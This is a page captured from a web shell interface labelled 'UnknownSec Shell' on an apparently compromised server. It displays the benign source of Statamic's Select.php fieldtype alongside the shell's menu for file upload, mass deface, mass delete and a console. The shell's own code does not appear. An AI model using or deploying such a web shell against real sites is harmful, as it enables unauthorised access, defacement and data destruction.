shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolasweb.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Fieldtypes
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
Select.php
<?php namespace Statamic\Fieldtypes; use Statamic\Fields\Fieldtype; class Select extends Fieldtype { use HasSelectOptions; protected $categories = ['controls']; protected $keywords = ['select', 'option', 'choice', 'dropdown', 'list']; protected $selectableInForms = true; protected $indexComponent = 'tags'; protected function configFieldItems(): array { return [ [ 'display' => __('Options'), 'fields' => [ 'options' => [ 'display' => __('Options'), 'instructions' => __('statamic::fieldtypes.select.config.options'), 'type' => 'array', 'expand' => true, 'key_header' => __('Key'), 'value_header' => __('Label').' ('.__('Optional').')', 'add_button' => __('Add Option'), ], 'taggable' => [ 'display' => __('Allow additions'), 'instructions' => __('statamic::fieldtypes.select.config.taggable'), 'type' => 'toggle', 'default' => false, ], 'push_tags' => [ 'display' => __('Push Tags'), 'instructions' => __('statamic::fieldtypes.select.config.push_tags'), 'type' => 'toggle', 'default' => false, ], ], ], [ 'display' => __('Selection'), 'fields' => [ 'placeholder' => [ 'display' => __('Placeholder'), 'instructions' => __('statamic::fieldtypes.select.config.placeholder'), 'type' => 'text', 'default' => '', ], 'multiple' => [ 'display' => __('Multiple'), 'instructions' => __('statamic::fieldtypes.select.config.multiple'), 'type' => 'toggle', 'default' => false, ], 'max_items' => [ 'display' => __('Max Items'), 'instructions' => __('statamic::messages.max_items_instructions'), 'min' => 1, 'type' => 'integer', ], 'clearable' => [ 'display' => __('Clearable'), 'instructions' => __('statamic::fieldtypes.select.config.clearable'), 'type' => 'toggle', 'default' => false, ], 'searchable' => [ 'display' => __('Searchable'), 'instructions' => __('statamic::fieldtypes.select.config.searchable'), 'type' => 'toggle', 'default' => true, ], ], ], [ 'display' => __('Data'), 'fields' => [ 'cast_booleans' => [ 'display' => __('Cast Booleans'), 'instructions' => __('statamic::fieldtypes.any.config.cast_booleans'), 'type' => 'toggle', 'default' => false, ], 'default' => [ 'display' => __('Default Value'), 'instructions' => __('statamic::messages.fields_default_instructions'), 'type' => 'text', ], ], ], ]; } }
© 2026 UnknownSec